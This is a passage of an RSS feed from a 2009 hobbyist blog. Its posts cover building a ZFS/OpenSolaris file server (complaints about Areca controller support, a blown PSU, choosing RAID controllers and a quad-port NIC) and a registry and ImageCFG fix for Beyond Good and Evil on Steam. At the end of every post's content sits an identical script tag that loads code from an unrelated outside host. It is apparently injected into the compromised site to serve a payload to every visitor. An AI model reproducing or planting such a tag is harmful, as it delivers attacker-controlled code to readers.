			<wfw:commentRss>http://wordpress.fusetnt.com/2009/09/curse-of-the-server/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Areca are liars: The ARC-1300ix 16 does not support Solaris</title>
		<link>http://wordpress.fusetnt.com/2009/08/areca-are-liars-the-arc-1300ix-16-does-not-support-solaris/</link>
		<comments>http://wordpress.fusetnt.com/2009/08/areca-are-liars-the-arc-1300ix-16-does-not-support-solaris/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 12:22:50 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[LSI SASX28]]></category>
		<category><![CDATA[Marvell 88se6440]]></category>
		<category><![CDATA[OpenSolaris]]></category>
		<category><![CDATA[redhat enterprise linux]]></category>
		<category><![CDATA[rhel]]></category>
		<category><![CDATA[Solaris]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=469</guid>
		<description><![CDATA[Well, that about settles it. This file server is cursed. After replacing the CPU and motherboard, I booted up my once again completed fileserver to find out, unlike as advertised, the ARC-1300ix 16 does not support Solaris in any fashion. At all. Areca has altered the product page too, conveniently after I purchased, to read [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp">
<div class="mceTemp">
<div id="attachment_475" class="wp-caption alignright" style="width: 210px"><img class="size-full wp-image-475" title="Areca -- We Lie" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/08/welie1.jpg" alt="Oh damn... why did no one tell me?" width="200" height="92" /><p class="wp-caption-text">Oh damn... why did no one tell me?</p></div>
</div>
<p><strong>Well, that about settles it. This file server is cursed.</strong></p>
</div>
<p>After replacing the CPU and motherboard, I booted up my once again completed fileserver to find out, unlike as advertised, the ARC-1300ix 16 does not support Solaris in any fashion. At all.</p>
<p>Areca has altered the product page too, conveniently after I purchased, to read &#8220;Solaris 10/11 (will be available with 6Gb/s Host Adapter)&#8221;.</p>
<p>Excuse me? It will be out when something is available that doesn&#8217;t even come on motherboards yet, let alone standalone adapters? Not to mention the drivers might possibly <em>not</em> support the card I bought which explicitly claimed support?</p>
<p><em>Bullshit.</em></p>
<p>The manual, of course, still claims Solaris support — both the one that came with the card, and online in the form of revision 1.1 (2009/5/8, hosted <a title="Areca ARC-1300ix 16 manual, advertising Solaris support." href="http://wordpress.fusetnt.com/wp-content/uploads/2009/08/ARC-1300_Manual.zip">here</a> in case Areca takes it down). Incidentally, it only offers RHEL for Linux support, and this comes as a <em>floppy image</em>!</p>
<p>For anyone that&#8217;s curious, it uses a Marvell 88se6440 plugged into an LSI SASX28. The latter is a port multiplier, supported by Solaris. The former is the controller, supports four drives and is most definitely not supported. Effectively, Areca is jamming in four drives per 3Gb/s channel, squeezed over a PCI-E 4x connection. I am more than slightly vexed.</p>
<p>I have filed a complaint through Areca&#8217;s web support form, but given that it didn&#8217;t even confirm that anything had been sent, I don&#8217;t hold out any hope for a response. If there isn&#8217;t one coming quickly, I&#8217;ll be requesting a refund from the distributor. My only concern is that there is now really no option but to pony up for the Adaptec 31605, since I no longer have the luxury of four PCI-E x16 slots to play with.</p>
<p><em><strong>Update:</strong><br />
</em>Areca has responded, and in a timely manner. Q3 huh? Soooo maybe October, factoring in delays. That&#8217;s a long time to wait to set up a file server. Have some nice people on the Sun side helping, but I believe it may still be dwelling in refund territory.<em><br />
</em></p>
<p><em>&#8212;-</em></p>
<p><em>Dear Sir,</em></p>
<p><em>in our plan, we will release the driver for solaris as soon as the 6G SAS HBA available, the planned schedule is the end of Q3. the driver can be used for 6G and 3G SAS HBA both.  sorry for the inconvenience.</em></p>
<p><em>Best Regards,</em></p>
<p><em>[Removed for privacy]</em></p>
<p><em>Areca Technology Tech-support Division<br />
Tel : [Removed for privacy]<br />
Fax : 886-2-87975970</p>
<p>Http://www.areca.com.tw</p>
<p>Ftp://ftp.areca.com.tw<br />
</em></p>
<p><em>Mirror Ftp :<br />
ftp://areca.starline.de</em><script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=469&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/08/areca-are-liars-the-arc-1300ix-16-does-not-support-solaris/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Pain and the other server</title>
		<link>http://wordpress.fusetnt.com/2009/07/pain-and-the-other-server/</link>
		<comments>http://wordpress.fusetnt.com/2009/07/pain-and-the-other-server/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 07:35:07 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[File Server]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[Asus P5Q-E]]></category>
		<category><![CDATA[MSI P7N Diamond]]></category>
		<category><![CDATA[power supply]]></category>
		<category><![CDATA[PSU]]></category>
		<category><![CDATA[Scythe Kaze Ultra SY124020L]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=467</guid>
		<description><![CDATA[So it turns out the triple redundant PSU supplied with the case was dodgy, and has subsequently blown out the motherboard. It seems the CPU is okay for now, but will require further testing, as will all the expansion cards plugged into it at the time. All this after I went to the trouble of [...]]]></description>
			<content:encoded><![CDATA[<p><strong>So it turns out the triple redundant PSU supplied with the case was dodgy, and has subsequently blown out the motherboard.</strong></p>
<p>It seems the CPU is okay for now, but will require further testing, as will all the expansion cards plugged into it at the time. All this after I went to the trouble of swapping out its noisy fans with Scythe Kaze Ultra SY124020L 40mm fans. To add insult to injury, a normal PSU won&#8217;t fit properly in the chassis.</p>
<p>Gah.</p>
<p>On a more positive note (so long as the PSU didn&#8217;t kill it too), I managed to get my hands on an Areca ARC-1300ix-16, since <a title="FortuneTec" href="http://www.fortunetec.com.au/" target="_blank">FortuneTec</a> decided to import a few thanks to demand. It rather uselessly comes with four Mini-SAS to Mini-SAS connectors, requiring me to buy two ludicrously expensive Mini-SAS to SATA breakout cables at around AUD$67 a pop. Considering I&#8217;ll eventually need four, almost AUD$270 for four cables is approaching <a title="Monster cables. Rip offs for idiots with too much money." href="http://www.monstercable.com/" target="_blank">Monster</a> in terms of rip offs. Sadly there seems to be no cheaper alternative, short of ordering from Hong Kong.</p>
<p>In the mean time, now I have my ARC, I don&#8217;t need the four PCI-E slots that the MSI provided, just three. I think I&#8217;ll go with the much safer and higher quality Asus, in particular, the P5Q-E.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=467&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/07/pain-and-the-other-server/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>More controller fuss, networking</title>
		<link>http://wordpress.fusetnt.com/2009/06/more-controller-fuss-networking/</link>
		<comments>http://wordpress.fusetnt.com/2009/06/more-controller-fuss-networking/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 13:40:48 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[File Server]]></category>
		<category><![CDATA[82571EB]]></category>
		<category><![CDATA[82571GB]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[HP NC364T]]></category>
		<category><![CDATA[Intel Pro 1000 PT]]></category>
		<category><![CDATA[LSI SAS3081E-R]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=451</guid>
		<description><![CDATA[I contacted PC-Pitstop to see if they would sell me the Areca ARC-1300ix 16, as it had started dribbling into stock in Canada and North America. They mentioned that one customer had an issue where the board could only see eight drives instead of the full 16, and wanted to wait until a new shipment [...]]]></description>
			<content:encoded><![CDATA[<p><strong>I contacted <a title="PC-Pitstop" href="http://www.pc-pitstop.com/" target="_blank">PC-Pitstop</a> to see if they would sell me the <a title="Areca ARC-1300ix 16" href="http://www.areca.com.tw/products/sasnoneraid.htm" target="_blank">Areca ARC-1300ix 16</a>, as it had started dribbling into stock in Canada and North America. They mentioned that one customer had an issue where the board could only see eight drives instead of the full 16, and wanted to wait until a new shipment to see if the problem persists before selling me anything.</strong></p>
<p>Very nice of a store to say so. I&#8217;ve been waiting a long time though, and yet another card has risen to viability&#8230;</p>
<div id="attachment_453" class="wp-caption aligncenter" style="width: 510px"><img class="size-full wp-image-453" title="LSI SAS3081E-R" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/lsisas3081e-r.jpg" alt="The LSI SAS3081E-R may provide salvation." width="500" height="301" /><p class="wp-caption-text">The LSI SAS3081E-R may provide salvation. Image courtesy of New Egg.</p></div>
<p>I&#8217;ve been told that <a title="LSI SAS3081E-R" href="http://www.lsi.com/storage_home/products_home/host_bus_adapters/sas_hbas/lsisas3081er/" target="_blank">LSI SAS3081E-R</a> is capable of setting up drives individually, rather than requiring a RAID mode be set. It all seems to be hearsay and rumours though, no one can 100 percent confirm it. Fortunately it&#8217;s also sold with Sun gear, which makes compatibility for OpenSolaris a no-brainer. <a title="New Egg LSI SAS3081E-R listing" href="http://www.newegg.com/Product/Product.aspx?Item=N82E16816118100" target="_blank">New Egg sells them for US$209</a>, and apparently it&#8217;s on PCI-E x8, offering more bandwidth than the ARC-1300ix 16 and having to share it with less ports. Of course LSI can&#8217;t decide whether it offers 2400MB/s or 2500MB/s according to its site — given that PCI-E is 250MB/s unidirectional per lane, it can only offer a lower 2000MB/s.</p>
<p>In the meant time, I picked an HP NC364T on <a title="eBay Australia" href="http://www.ebay.com.au" target="_blank">eBay Australia</a> for AU$348, and am eagerly awaiting its arrival. The quad-gigabit Ethernet card uses dual Intel 82571EB chips over PCI-E x4, which are functionally identical to the 82751GB chips found on the <a title="Intel Pro/1000 PT Quad Port Low Profile adapter" href="http://www.intel.com/Products/Server/Adapters/PRO1000PT-QuadPort-Low-Profile/PRO1000PT-QuadPort-Low-Profile-overview.htm" target="_blank">Intel PRO/1000 PT Quad Port Low Profile adapter</a> — for all intents and purposes making this a rebadge. Considering both cards go retail for around AU$1000, it&#8217;s an absolute steal, and should be fun to team or load balance over. By and large a dedicated network card should not only reduce the latency over an integrated, but may help maximise network throughput.</p>
<p><div id="attachment_456" class="wp-caption aligncenter" style="width: 510px"><img class="size-full wp-image-456" title="HP NC364T" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/hpgbnic.jpg" alt="While I'm not quite ready to go 4GbE, the HP NC364T should help me grow a little." width="500" height="301" /><p class="wp-caption-text">While I&#39;m not quite ready to go 4GbE, the HP NC364T should help me grow a little.</p></div><script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=451&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/06/more-controller-fuss-networking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Making old games in Steam not suck — Part 1: Beyond Good and Evil</title>
		<link>http://wordpress.fusetnt.com/2009/06/making-old-games-in-steam-not-suck-part-1-beyond-good-and-evil/</link>
		<comments>http://wordpress.fusetnt.com/2009/06/making-old-games-in-steam-not-suck-part-1-beyond-good-and-evil/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 12:54:56 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Games]]></category>
		<category><![CDATA[audio desynch]]></category>
		<category><![CDATA[audio synch]]></category>
		<category><![CDATA[audio synchronisation]]></category>
		<category><![CDATA[Beyond Good and Evil]]></category>
		<category><![CDATA[bug fix]]></category>
		<category><![CDATA[glitches]]></category>
		<category><![CDATA[Goodoldgames]]></category>
		<category><![CDATA[ImageCFG]]></category>
		<category><![CDATA[Steam]]></category>
		<category><![CDATA[Ubisoft]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=427</guid>
		<description><![CDATA[Sometimes publishers don&#8217;t bother updating old games before they put them on Steam. They just upload and watch the money come in, ignoring the complaints as the game fails to run optimally on modern systems. Ubisoft sure screwed Beyond Good and Evil up in this fashion, from texture issues, to performance problems, to audio synch [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_445" class="wp-caption aligncenter" style="width: 510px"><img class="size-full wp-image-445" title="Beyond Good and Evil" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/bge.jpg" alt="No doubt Jade would be unimpressed with her treatment" width="500" height="301" /><p class="wp-caption-text">No doubt Jade would be unimpressed with her treatment</p></div>
<p><strong>Sometimes publishers don&#8217;t bother updating old games before they put them on <a title="Steam" href="http://www.steampowered.com" target="_blank">Steam</a>. They just upload and watch the money come in, ignoring the complaints as the game fails to run optimally on modern systems.</strong></p>
<p>Ubisoft sure screwed Beyond Good and Evil up in this fashion, from texture issues, to performance problems, to audio synch screw ups. The fact that they sell this broken version on both Steam and <a title="GoodOldGames" href="http://www.gog.com" target="_blank">GoodOldGames</a> is appalling. Thankfully there&#8217;s a few steps you can take to make things friendlier, but you&#8217;ll have to accept lower graphical detail and some textures, like the moon in the sky, will always flicker.</p>
<p>Firstly, if the game claims it&#8217;s not installed properly, you&#8217;ll need to edit the registry.</p>
<ol>
<li>Run <strong>regedit</strong>.</li>
<li>Browse to <strong>HKEY_LOCAL_MACHINE\SOFTWARE\Ubisoft\Beyond Good &amp; Evil</strong>. If the key doesn&#8217;t exist, create it.</li>
<li>Create a new <strong>String Value</strong> and call it <strong>Install Path</strong>. Set the value to where Beyond Good and Evil is installed (e.g. C:\Program Files (x86)\Steam\steamapps\common\beyond good and evil).</li>
<li>Restart Steam and the game should now launch settings application.</li>
</ol>
<p>If it&#8217;s loading the game, here&#8217;s how to fix some of the performance issues:</p>
<ol>
<li>Run the <strong>SettingsApplication.exe</strong> file from <em>Program Files\Steam\steamapps\common\beyond good and evil</em>. Select the <strong>Advanced Settings</strong> tab.</li>
<li>Check <strong>Manual compatibility settings</strong>. Deselect <strong>HW Vertex Processing</strong>, <strong>Fastflip</strong> and <strong>Triple-buffering</strong>. This should fix the majority of graphical glitches, although comes at the cost of slowdown. You&#8217;ll still get the occasional texture flicker.</li>
<li>If you own an Nvidia card, move the <strong>Water detail</strong> slider to <strong>Low</strong> to fix the performance issues in the city. Setting <strong>Shadows quality</strong> to <strong>Low</strong> and <strong>Antialiasing</strong> to <strong>Off</strong> should also help the overall game. These settings should run the game comfortably on a GeForce GTX 275.
<div id="attachment_438" class="wp-caption aligncenter" style="width: 460px"><img class="size-full wp-image-438" title="Beyond Good and Evil Settings" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/bgesettings.jpg" alt="Yes, against all your better judgement, you need to turn things down or off." width="450" height="403" /><p class="wp-caption-text">Yes, against all your better judgement, you need to turn things down or off.</p></div></li>
<li>If you own an ATI card, things aren&#8217;t quite as rough, although you will be nagged at every launch about out of date drivers. You&#8217;ll need to take AA down a couple of notches so particles don&#8217;t slow the game down, but in testing a Radeon HD 5870 handled the game fine with the AA dialed back two notches at 2560&#215;1600.
<p><div id="attachment_670" class="wp-caption aligncenter" style="width: 460px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/bge-ati.jpg"><img class="size-full wp-image-670" title="Beyond Good &amp; Evil ATI settings" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/bge-ati.jpg" alt="Beyond Good &amp; Evil ATI settings" width="450" height="400" /></a><p class="wp-caption-text">ATI users are a bit better off, but will get nagged about driver updates at every launch.</p></div></li>
<li>If you have a multicore PC, you may experience audio synch issues. To fix, upon running the game <strong>Alt+Tab</strong> out and invoke <strong>Windows Task Manager</strong> by pressing <strong>Ctrl+Shift+Esc</strong>. Go to the <strong>Processes </strong>tab, select <strong>BGE.exe</strong>,  right click and choose <strong>Set Affinity</strong>. Deselect everything except <strong>CPU 0</strong>. Return to the game and begin playing.
<p><div id="attachment_439" class="wp-caption aligncenter" style="width: 460px"><img class="size-full wp-image-439" title="Beyond Good and Evil Task Manager" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/taskmanager.jpg" alt="Setting affinity for BGE.exe" width="450" height="394" /><p class="wp-caption-text">Setting affinity for BGE.exe</p></div></li>
</ol>
<p>If you don&#8217;t want to set affinity every time you run Beyond Good and Evil, you can modify the .exe using a program called <a title="ImageCFG" href="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/Imagecfg.zip">ImageCFG</a>.</p>
<ol>
<li>You&#8217;ll need to first right click on the Beyond Good and Evil entry in Steam, and choose <strong>Properties </strong>and then hit the <strong>Updates</strong> tab. Select <strong>Do not automatically update this game</strong> and click <strong>Close</strong>.</li>
<li>Download <a title="ImageCFG" href="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/Imagecfg.zip">ImageCFG</a> and copy it into your <em>Program Files\Steam\steamapps\common\beyond good and evil </em>folder.</li>
<li>Open up a <strong>Command Prompt</strong>, browse to the above directory and use the following commands:</li>
<p><code>imagecfg -u bge.exe<br />
imagecfg -a 0x1 bge.exe</code></ol>
<p>The first command modifies the .exe to be uniprocessor only, the second defines the core affinity it should run on; in this case it&#8217;s been associated with CPU 0.</p>
<p><div id="attachment_440" class="wp-caption aligncenter" style="width: 510px"><img class="size-full wp-image-440" title="ImageCFG modifying BGE.exe" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/imagecfgbge.jpg" alt="Using ImageCFG to modify BGE.exe to single core." width="500" height="261" /><p class="wp-caption-text">Using ImageCFG to modify BGE.exe to single core.</p></div>
<p>Enjoy this stylish and excellent old game.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=427&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/06/making-old-games-in-steam-not-suck-part-1-beyond-good-and-evil/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The continuous controller conundrum</title>
		<link>http://wordpress.fusetnt.com/2009/06/the-continuous-controller-conundrum/</link>
		<comments>http://wordpress.fusetnt.com/2009/06/the-continuous-controller-conundrum/#comments</comments>
		<pubDate>Mon, 08 Jun 2009 04:24:08 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Adaptec 31605]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[HP P400]]></category>
		<category><![CDATA[Intel RAID Controller SRCSATAWB]]></category>
		<category><![CDATA[Intel SRCSASPH16I]]></category>
		<category><![CDATA[LSI MegaRAID SAS 84016E]]></category>
		<category><![CDATA[LSI MegaRAID SAS 8708ELP]]></category>
		<category><![CDATA[OpenSolaris]]></category>
		<category><![CDATA[PC Pitstop]]></category>
		<category><![CDATA[ZFS]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=407</guid>
		<description><![CDATA[Strike another one off the list — the HP Smart Array P400 doesn&#8217;t present drives through JBOD to the OS, only through RAID 0. This adds an extra layer of complexity to rebuilding disks, as when a disk fails, the card assumes a RAID 0 array has died, regardless of what you&#8217;re doing with ZFS. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Strike another one off the list — the <a title="HP Smart Array P400" href="http://h18004.www1.hp.com/products/quickspecs/12400_div/12400_div.html" target="_blank">HP Smart Array P400</a> doesn&#8217;t present drives through JBOD to the OS, only through RAID 0.</strong></p>
<p>This adds an extra layer of complexity to <a title="Rebuilding disks on the P400 is a hassle." href="http://ru.opensolaris.org/jive/thread.jspa?messageID=332360" target="_blank">rebuilding disks</a>, as when a disk fails, the card assumes a RAID 0 array has died, regardless of what you&#8217;re doing with ZFS. Apart from removing the ability to yank a disk on a live array then pop it back in and continue as normal, this adds extra overhead as the card is managing RAID 0 data for every drive attached to it <em>on top of</em> the RAID-Z already being done on the software side. Bad, bad, bad.</p>
<div id="attachment_412" class="wp-caption aligncenter" style="width: 410px"><img class="size-full wp-image-412" title="The LSI MegaRAID SAS 84016E" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/lsi84016.jpg" alt="The LSI MegaRAID SAS 84016E" width="400" height="293" /><p class="wp-caption-text">The LSI MegaRAID SAS 84016E</p></div>
<p>We have a new contender though, the <a title="LSI MegaRAID SAS 84016E" href="http://www.lsi.com/storage_home/products_home/internal_raid/megaraid_sas/megaraid_sas_84016e/index.html" target="_blank">LSI MegaRAID SAS 84016E</a> (also known as the Intel SRCSASPH16I), which definitely has <a title="LSI driver" href="http://docs.sun.com/app/docs/doc/819-2254/mega-sas-7d?l=zh&amp;q=T3&amp;s=t&amp;a=view" target="_blank">OpenSolaris driver support</a>, but as usual is not available in Australia (the Intel is, but is over AU$1,000). It&#8217;s more expensive than the vapourous ARC-1300ix-16, thanks to it being PCI-E 8x rather than 4x. It&#8217;s also a true RAID card with 256MB of memory, and can handle up to RAID 60 thanks to a 500MHz Intel IOP333 processor.</p>
<p><a title="PC Pitstop" href="http://www.pc-pitstop.com/sas_controllers/84016E.asp" target="_blank">PC Pitstop</a> sells them at US$689, and the site even has a section saying it ships to Australia. Now if only a certain eBay seller wasn&#8217;t selling it for almost US$100 cheaper <em>with</em> free shipping&#8230;</p>
<p>Then there&#8217;s the <a title="Intel RAID Controller SRCSATAWB" href="http://www.intel.com/products/server/raid-controllers/srcsatawb/srcsatawb-overview.htm" target="_blank">Intel RAID Controller SRCSATAWB</a>. This is a modified LSI MegaRAID SAS 8708ELP, doesn&#8217;t work in PCI-E 2.0, seems to have virtually the same featureset as the 84016E, but with only two mini-SAS ports. <a title="EYO Drop Shipping" href="http://www.retailing.com.au" target="_blank">EYO Drop Shipping</a> is currently selling it for AU$576.18.</p>
<div id="attachment_421" class="wp-caption aligncenter" style="width: 410px"><img class="size-full wp-image-421" title="The Intel RAID Controller SRCSATAWB" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/06/intelsrcsatawb.jpg" alt="The Intel RAID Controller SRCSATAWB" width="400" height="286" /><p class="wp-caption-text">The Intel RAID Controller SRCSATAWB</p></div>
<p>For both, the manuals mention nothing about JBOD, which may resign them to the same scrap heap as the P400. They do mention virtual drives, but these seem to only be accessible when creating an array. There&#8217;s no mention of running single drives in order to access software RAID.</p>
<p>Edit: Neither card offers JBOD functionality. At this rate I&#8217;ll end up buying the crazily expensive <a title="Adaptec 31605" href="http://www.adaptec.com/en-US/products/Controllers/Hardware/sas/value/SAS-31605/" target="_blank">Adaptec 31605</a> just to get working gear.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=407&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/06/the-continuous-controller-conundrum/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
